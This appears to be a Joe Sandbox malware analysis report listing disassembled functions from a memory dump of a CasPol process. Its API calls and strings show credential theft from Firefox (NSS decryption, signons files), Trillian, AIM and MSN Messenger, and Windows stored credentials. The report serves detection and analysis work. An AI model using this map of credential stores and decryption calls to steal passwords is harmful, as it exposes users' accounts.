                                                                                                                                                                                    Function 0040C66A Relevance: 47.4, APIs: 21, Strings: 6, Instructions: 185windowCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00404D7A: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404D99
                                                                                                                                                                                      • Part of subcall function 00404D7A: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404DAB
                                                                                                                                                                                      • Part of subcall function 00404D7A: FreeLibrary.KERNEL32(00000000), ref: 00404DBF
                                                                                                                                                                                      • Part of subcall function 00404D7A: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404DEA
                                                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 0040C6A7
                                                                                                                                                                                    • EnumResourceTypesA.KERNEL32(00412111,00000000), ref: 0040C6C3
                                                                                                                                                                                    • MessageBoxA.USER32(00000000,Failed to load the executable file !,Error,00000030), ref: 0040C6E5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Library$FreeMessage$AddressEnumLoadProcResourceTypes
                                                                                                                                                                                    • String ID: /deleteregkey$/savelangfile$Error$Failed to load the executable file !$Software\NirSoft\MessenPass$f-@
                                                                                                                                                                                    • API String ID: 1343656639-3807849023
                                                                                                                                                                                    • Opcode ID: bbacde5a5cd21ba3b0067782a62bd30c38fe63f76bbb2082e6cf8d62c0ef1d45
                                                                                                                                                                                    • Instruction ID: c9cf7fae9a68988a057e6d0076c0e2abe6ed6f3ff992c821ff985c928f871611
                                                                                                                                                                                    • Opcode Fuzzy Hash: bbacde5a5cd21ba3b0067782a62bd30c38fe63f76bbb2082e6cf8d62c0ef1d45
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7661917190420AEBDF21AF61DD89ADE3BB8BF84305F10817BF905A21A0DB389945DF5D
                                                                                                                                                                                    Function 00405EC5 Relevance: 35.2, APIs: 15, Strings: 5, Instructions: 161registryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00405EE7
                                                                                                                                                                                    • memset.MSVCRT ref: 00405EFF
                                                                                                                                                                                      • Part of subcall function 00411D68: RegOpenKeyExA.KERNEL32(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                                                                                                                                                                    • memset.MSVCRT ref: 00405F3A
                                                                                                                                                                                      • Part of subcall function 00411DEE: RegEnumKeyExA.KERNEL32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
                                                                                                                                                                                    • _mbsnbicmp.MSVCRT ref: 00405F68
                                                                                                                                                                                    • memset.MSVCRT ref: 00405F87
                                                                                                                                                                                    • memset.MSVCRT ref: 00405FA0
                                                                                                                                                                                    • _snprintf.MSVCRT ref: 00405FB9
                                                                                                                                                                                    • _mbsrchr.MSVCRT ref: 00405FDE
                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 00406012
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040602B
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?,?,?), ref: 0040603E
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 0040607A
                                                                                                                                                                                    • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$_mbscpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                                                                                                                                    • String ID: %programfiles%\Mozilla Firefox$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                                                                                                    • API String ID: 201549630-2797892316
                                                                                                                                                                                    • Opcode ID: dd6206d5936df01191ee13b9ca55f0c83b93ca1a2f1ec4be9d581242c1b61764
                                                                                                                                                                                    • Instruction ID: a9db27f8d3bb6867008f3f8c7ab71477537d255c6bc9b4b6a3b98ebc98dd088a
                                                                                                                                                                                    • Opcode Fuzzy Hash: dd6206d5936df01191ee13b9ca55f0c83b93ca1a2f1ec4be9d581242c1b61764
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8F51B7B184015DBADB21DB619C86EDF7BBC9F15304F0004FAB548E2142EA789FC58BA5
                                                                                                                                                                                    Function 00410C4C Relevance: 35.1, APIs: 13, Strings: 7, Instructions: 93libraryloaderstringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                      • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EE7
                                                                                                                                                                                      • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405EFF
                                                                                                                                                                                      • Part of subcall function 00405EC5: memset.MSVCRT ref: 00405F3A
                                                                                                                                                                                      • Part of subcall function 00405EC5: RegCloseKey.ADVAPI32(?), ref: 0040606C
                                                                                                                                                                                      • Part of subcall function 00405EC5: _mbscpy.MSVCRT(?,?), ref: 0040607A
                                                                                                                                                                                      • Part of subcall function 00405EC5: ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Firefox,?,00000104), ref: 0040608C
                                                                                                                                                                                      • Part of subcall function 00405EC5: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 004060A4
                                                                                                                                                                                    • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                    • SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                    • memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                    • strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                    • strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                    • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                                                                                                                                                      • Part of subcall function 00406B4B: _mbscpy.MSVCRT(0040390F,00000000,0040390F,0040D4CE,00000000,Trillian\users\global), ref: 00406B53
                                                                                                                                                                                      • Part of subcall function 00406B4B: _mbscat.MSVCRT ref: 00406B62
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$memset$CurrentDirectory$_mbscpystrlen$CloseEnvironmentExpandLibraryLoadStrings_mbscat
                                                                                                                                                                                    • String ID: NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_FreeSlot$PK11_GetInternalKeySlot$nss3.dll
                                                                                                                                                                                    • API String ID: 2719586705-3659000792
                                                                                                                                                                                    • Opcode ID: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                                                                    • Instruction ID: 3c436980af1a21df5e4856e841a29f4fe06fda5e66834ce9295461a77701cb90
                                                                                                                                                                                    • Opcode Fuzzy Hash: 75917a1aec9986030c83e97f8a6c26f5c534c2a98396f13b9efaf1f70b8442b1
                                                                                                                                                                                    • Instruction Fuzzy Hash: BB317671940308AFCB20EFB5DC89ECABBB8AF64704F10486EE185D3141DAB996C48F54
                                                                                                                                                                                    Function 00407C79 Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 143stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 108 407c79-407dc2 memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 109 407dc4 108->109 110 407df8-407dfb 108->110 111 407dca-407dd3 109->111 112 407e2c-407e30 110->112 113 407dfd-407e06 110->113 114 407dd5-407dd9 111->114 115 407dda-407df6 111->115 116 407e08-407e0c 113->116 117 407e0d-407e2a 113->117 114->115 115->110 115->111 116->117 117->112 117->113
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00407CDB
                                                                                                                                                                                    • memset.MSVCRT ref: 00407CEF
                                                                                                                                                                                    • memset.MSVCRT ref: 00407D09
                                                                                                                                                                                    • memset.MSVCRT ref: 00407D1E
                                                                                                                                                                                    • GetComputerNameA.KERNEL32(?,?), ref: 00407D40
                                                                                                                                                                                    • GetUserNameA.ADVAPI32(?,?), ref: 00407D54
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D73
                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 00407D88
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407D91
                                                                                                                                                                                    • strlen.MSVCRT ref: 00407DA0
                                                                                                                                                                                    • memcpy.MSVCRT(?,000000A3,00000010,?,?), ref: 00407DB2
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                                                                                                                                                    • String ID: 5$H$O$b$i$}$}
                                                                                                                                                                                    • API String ID: 1832431107-3760989150
                                                                                                                                                                                    • Opcode ID: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                    • Instruction ID: c5d11ab3608301e1d6334a6842c6e335c593dc938f6648a4795a3d5a3f6caa6c
                                                                                                                                                                                    • Opcode Fuzzy Hash: fa53add491d98d1486bc50851db0f2d2053b3cdea30a1b6f38a2d4001a04f200
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0951D671C0025DFEDB11CFA4CC81AEEBBBCEF49314F0481AAE555A6181D3389B85CBA5
                                                                                                                                                                                    Function 004064FB Relevance: 19.7, APIs: 10, Strings: 3, Instructions: 158stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 118 4064fb-40651b call 410c4c 121 406521-406555 memset call 406958 118->121 122 4066d9-4066e0 118->122 125 406563 121->125 126 406557-406561 121->126 127 406566-406568 125->127 126->127 128 4066d4 call 410d6f 127->128 129 40656e-4065d3 memset * 3 strlen * 2 127->129 128->122 131 4065d5-4065e6 call 406b4b 129->131 132 4065e8 129->132 135 4065ef-40660c strlen * 2 131->135 132->135 137 406621 135->137 138 40660e-40661f call 406b4b 135->138 140 406628-406645 strlen * 2 137->140 138->140 142 406647-406658 call 406b4b 140->142 143 40665a 140->143 144 406661-406670 call 4069d3 142->144 143->144 149 406681-406690 call 4069d3 144->149 150 406672-40667c call 4062db 144->150 154 4066a1-4066b0 call 4069d3 149->154 155 406692-40669c call 4062db 149->155 150->149 159 4066c1-4066d0 154->159 160 4066b2-4066bc call 4062db 154->160 155->154 159->128 161 4066d2 159->161 160->159 161->128
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410C6D
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00410C92
                                                                                                                                                                                      • Part of subcall function 00410C4C: SetCurrentDirectoryA.KERNELBASE(?), ref: 00410C9F
                                                                                                                                                                                      • Part of subcall function 00410C4C: memset.MSVCRT ref: 00410CB4
                                                                                                                                                                                      • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CBE
                                                                                                                                                                                      • Part of subcall function 00410C4C: strlen.MSVCRT ref: 00410CCC
                                                                                                                                                                                      • Part of subcall function 00410C4C: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00410D0B
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(00000000,NSS_Init), ref: 00410D23
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,NSS_Shutdown), ref: 00410D2F
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_GetInternalKeySlot), ref: 00410D3B
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_FreeSlot), ref: 00410D47
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11_Authenticate), ref: 00410D53
                                                                                                                                                                                      • Part of subcall function 00410C4C: GetProcAddress.KERNEL32(?,PK11SDR_Decrypt), ref: 00410D5F
                                                                                                                                                                                    • memset.MSVCRT ref: 00406537
                                                                                                                                                                                      • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                                                                                                                                                                      • Part of subcall function 00406958: memcpy.MSVCRT(00000000,00000000,00000000,00000000,0040D450,trillian,?,?,?,?,?,00000000,00000000), ref: 00406972
                                                                                                                                                                                    • memset.MSVCRT ref: 0040657E
                                                                                                                                                                                    • memset.MSVCRT ref: 00406596
                                                                                                                                                                                    • memset.MSVCRT ref: 004065AE
                                                                                                                                                                                    • strlen.MSVCRT ref: 004065B9
                                                                                                                                                                                    • strlen.MSVCRT ref: 004065C7
                                                                                                                                                                                    • strlen.MSVCRT ref: 004065F2
                                                                                                                                                                                    • strlen.MSVCRT ref: 00406600
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040662B
                                                                                                                                                                                    • strlen.MSVCRT ref: 00406639
                                                                                                                                                                                      • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                                                                      • Part of subcall function 004062DB: GetFileSize.KERNEL32(00000000,00000000), ref: 00406306
                                                                                                                                                                                      • Part of subcall function 004062DB: ??2@YAPAXI@Z.MSVCRT ref: 0040631A
                                                                                                                                                                                      • Part of subcall function 004062DB: memset.MSVCRT ref: 00406349
                                                                                                                                                                                      • Part of subcall function 004062DB: memset.MSVCRT ref: 00406368
                                                                                                                                                                                      • Part of subcall function 004062DB: memset.MSVCRT ref: 0040637A
                                                                                                                                                                                      • Part of subcall function 004062DB: strcmp.MSVCRT ref: 004063B9
                                                                                                                                                                                      • Part of subcall function 004062DB: ??3@YAXPAX@Z.MSVCRT(?), ref: 004064E5
                                                                                                                                                                                      • Part of subcall function 004062DB: CloseHandle.KERNEL32(?), ref: 004064EE
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memsetstrlen$AddressProc$CurrentDirectoryFile$??2@??3@AttributesCloseHandleLibraryLoadSizememcpystrcmp
                                                                                                                                                                                    • String ID: signons.txt$signons2.txt$signons3.txt
                                                                                                                                                                                    • API String ID: 4081699353-561706229
                                                                                                                                                                                    • Opcode ID: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                                                                                                    • Instruction ID: 377b3a65c9dd8df244cffc1a210365992fa2ecb4602db1b88cb694f2acf2e346
                                                                                                                                                                                    • Opcode Fuzzy Hash: 7da170244c5e44e2ab2624a41fc5cd2ef5c298c791df7e28cb4a8979ce54e25b
                                                                                                                                                                                    • Instruction Fuzzy Hash: C051C47280401CAACF11EA65DC85BCE7BACAF15319F5504BFF509F2181EB389B988B58
                                                                                                                                                                                    Function 0040D3A0 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 109stringCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 163 40d3a0-40d3ed memset call 411dae 166 40d422-40d425 163->166 167 40d3ef-40d400 call 407139 163->167 168 40d427-40d434 call 41212c 166->168 169 40d46b-40d4b9 memset call 41223f strlen * 2 166->169 167->166 175 40d402-40d415 call 4069d3 167->175 174 40d439-40d45c call 40680e call 406958 call 4069d3 168->174 179 40d4d2 169->179 180 40d4bb-40d4d0 call 406b4b 169->180 174->169 195 40d45e-40d46a _mbscpy 174->195 175->166 187 40d417-40d421 _mbscpy 175->187 181 40d4d5-40d4de call 4069d3 179->181 180->181 191 40d4e0 181->191 192 40d4e2-40d4e6 181->192 187->166 191->192 195->169
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D3C8
                                                                                                                                                                                      • Part of subcall function 00411DAE: RegCloseKey.KERNEL32(00000000,?,00000000,00000000), ref: 00411DE3
                                                                                                                                                                                    • _mbscpy.MSVCRT(00403A14,00000000,?,?,?,?,?,00000000,00000000), ref: 0040D41B
                                                                                                                                                                                    • _mbscpy.MSVCRT(00403A14,00000000,?,?,?,?,?,00000000,00000000), ref: 0040D464
                                                                                                                                                                                    • memset.MSVCRT ref: 0040D47C
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040D49D
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040D4AB
                                                                                                                                                                                      • Part of subcall function 00407139: strlen.MSVCRT ref: 0040714B
                                                                                                                                                                                      • Part of subcall function 00407139: strlen.MSVCRT ref: 00407153
                                                                                                                                                                                      • Part of subcall function 00407139: _memicmp.MSVCRT ref: 00407171
                                                                                                                                                                                      • Part of subcall function 004069D3: GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen$_mbscpymemset$AttributesCloseFile_memicmp
                                                                                                                                                                                    • String ID: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Trillian$Trillian\users\global$UninstallString$trillian$trillian.exe
                                                                                                                                                                                    • API String ID: 2174551368-3003071570
                                                                                                                                                                                    • Opcode ID: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
                                                                                                                                                                                    • Instruction ID: 7bc3b858bee9d9e9ac8f81dd2a2494a9b2267e2ac629f59b21fbbbeb3bb54d2f
                                                                                                                                                                                    • Opcode Fuzzy Hash: e259f277b1496aa0bd8dd7d471ad79ad235791e513a4ae2e0a80bbcb3c597bbd
                                                                                                                                                                                    • Instruction Fuzzy Hash: 72312B7290421469E720AA659C46BDF3B988F11715F20007FF548F71C2DEBCAAC487AD
                                                                                                                                                                                    Function 004103F1 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 99registryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 196 4103f1-410422 call 414060 RegOpenKeyExA 199 410518-41051c 196->199 200 410428-41043a RegOpenKeyExA 196->200 201 410440-410467 RegQueryValueExA 200->201 202 41050f-410512 RegCloseKey 200->202 203 410506-410509 RegCloseKey 201->203 204 41046d-41047c call 404c9d 201->204 202->199 203->202 204->203 207 410482-4104b4 call 404cf5 204->207 207->203 210 4104b6-4104bd 207->210 211 4104fd-410500 LocalFree 210->211 212 4104bf-4104f8 memcpy * 2 call 4100a4 210->212 211->203 212->211
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,7701485B,00000000,?,0040DCC1,?), ref: 0041041E
                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,Dynamic Salt,00000000,00020019,?,?,7701485B,00000000,?,0040DCC1,?), ref: 00410436
                                                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,7701485B,00000000,?,0040DCC1), ref: 0041045F
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,7701485B,00000000,?,0040DCC1), ref: 00410509
                                                                                                                                                                                      • Part of subcall function 00404C9D: LoadLibraryA.KERNEL32(crypt32.dll), ref: 00404CAA
                                                                                                                                                                                      • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData,?,?), ref: 00404CBC
                                                                                                                                                                                    • memcpy.MSVCRT(?,0041B008,00000040,7701485B,?,?,?,7701485B,00000000), ref: 004104C8
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,?), ref: 004104DD
                                                                                                                                                                                      • Part of subcall function 004100A4: RegOpenKeyExA.ADVAPI32(004104FD,Creds,00000000,00020019,004104FD,00000040,0041B008,?,?,004104FD,?,?,?,?), ref: 004100C8
                                                                                                                                                                                      • Part of subcall function 004100A4: memset.MSVCRT ref: 004100EA
                                                                                                                                                                                      • Part of subcall function 004100A4: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 004101E7
                                                                                                                                                                                      • Part of subcall function 004100A4: RegCloseKey.ADVAPI32(?), ref: 004101F8
                                                                                                                                                                                    • LocalFree.KERNEL32(0040DCC1,7701485B,?,?,?,7701485B,00000000), ref: 00410500
                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?,?,7701485B,00000000,?,0040DCC1,?), ref: 00410512
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                                                                                                                                                                                    • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value
                                                                                                                                                                                    • API String ID: 2768085393-888555734
                                                                                                                                                                                    • Opcode ID: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                                                                                                                                                                    • Instruction ID: a3322e4f6880ec2e25c1dd16e8e651f617ea5ab7975a499ff40f994b3e8bdadf
                                                                                                                                                                                    • Opcode Fuzzy Hash: d648e9b0c95eff2677d72af7b673b930fecaf3740d0545a91529973bbe74cb9a
                                                                                                                                                                                    • Instruction Fuzzy Hash: B631E7B690011DABDB119B95EC45EEFBBBDEF48348F004066FA05F2111E7749A848BA8
                                                                                                                                                                                    Function 00413E10 Relevance: 18.1, APIs: 12, Instructions: 128COMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 214 413e10-413e2c call 414000 GetModuleHandleA 217 413e4d-413e50 214->217 218 413e2e-413e39 214->218 220 413e79-413ec6 __set_app_type __p__fmode __p__commode call 413ffa 217->220 218->217 219 413e3b-413e44 218->219 222 413e65-413e69 219->222 223 413e46-413e4b 219->223 227 413ed4-413f2e call 413fe8 _initterm __getmainargs _initterm 220->227 228 413ec8-413ed3 __setusermatherr 220->228 222->217 226 413e6b-413e6d 222->226 223->217 225 413e52-413e59 223->225 225->217 229 413e5b-413e63 225->229 230 413e73-413e76 226->230 233 413f30-413f38 227->233 234 413f6a-413f6d 227->234 228->227 229->230 230->220 237 413f3a-413f3c 233->237 238 413f3e-413f41 233->238 235 413f47-413f4b 234->235 236 413f6f-413f73 234->236 240 413f51-413f62 GetStartupInfoA 235->240 241 413f4d-413f4f 235->241 236->234 237->233 237->238 238->235 239 413f43-413f44 238->239 239->235 242 413f75-413f77 240->242 243 413f64-413f68 240->243 241->239 241->240 244 413f78-413f8c GetModuleHandleA call 40c66a 242->244 243->244 247 413f95-413fd5 _cexit call 414039 244->247 248 413f8e-413f8f exit 244->248 248->247
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3662548030-0
                                                                                                                                                                                    • Opcode ID: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
                                                                                                                                                                                    • Instruction ID: 1a0d48d648a4d99901fb7feaec5c467672ee51f091280c2f058e756afb183587
                                                                                                                                                                                    • Opcode Fuzzy Hash: 632bd22da57b14eafad8c86f7debf7b27b33ce24f3ab1356985adfa30974a25f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9841A071D00309DFDB209FA4D884AEE7BB4FB08715F20416BE46197291D7784AC2CB5C
                                                                                                                                                                                    Function 0040DA79 Relevance: 17.7, APIs: 4, Strings: 6, Instructions: 198registryCOMMON
                                                                                                                                                                                    Download Yara Rule

                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                    • Executed
                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                    control_flow_graph 252 40da79-40daaf call 40fd01 255 40dab2-40dab5 252->255 256 40dae7-40daeb 255->256 257 40dab7-40dacf RegOpenKeyExA 255->257 258 40db0c-40db13 call 40ff88 256->258 259 40daed-40db05 RegOpenKeyExA 256->259 260 40dad1 257->260 261 40dae3-40dae5 257->261 265 40db18-40db1a 258->265 259->261 262 40db07-40db0a 259->262 264 40dad4-40dae1 call 40fe5d 260->264 261->265 262->264 264->265 266 40db1c-40db6c call 406958 * 2 265->266 267 40db6e-40db75 265->267 266->267 267->255 270 40db7b-40db93 RegOpenKeyExA 267->270 273 40dbb1 270->273 274 40db95-40dbaf call 40fd2e 270->274 275 40dbb3-40dbb5 273->275 274->275 279 40dc11-40dc29 RegOpenKeyExA 275->279 280 40dbb7-40dc0f call 406958 * 2 275->280 283 40dc47 279->283 284 40dc2b-40dc45 call 40fd2e 279->284 280->279 288 40dc49-40dc4b 283->288 284->288 289 40dca2-40dccd call 4103f1 call 410205 288->289 290 40dc4d-40dca0 call 406958 * 2 288->290 303 40dcd8-40dcef call 404ce0 * 2 289->303 304 40dccf-40dcd3 call 410383 289->304 290->289 304->303
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
                                                                                                                                                                                      • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
                                                                                                                                                                                    • RegOpenKeyExA.KERNEL32(80000001,Software\Microsoft\MSNMessenger,00000000,00020019,?), ref: 0040DACB
                                                                                                                                                                                      • Part of subcall function 0040FF88: CredReadW.ADVAPI32(Passport.Net\*,00000004,00000000,?,7701485B), ref: 0040FFCF
                                                                                                                                                                                      • Part of subcall function 0040FF88: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
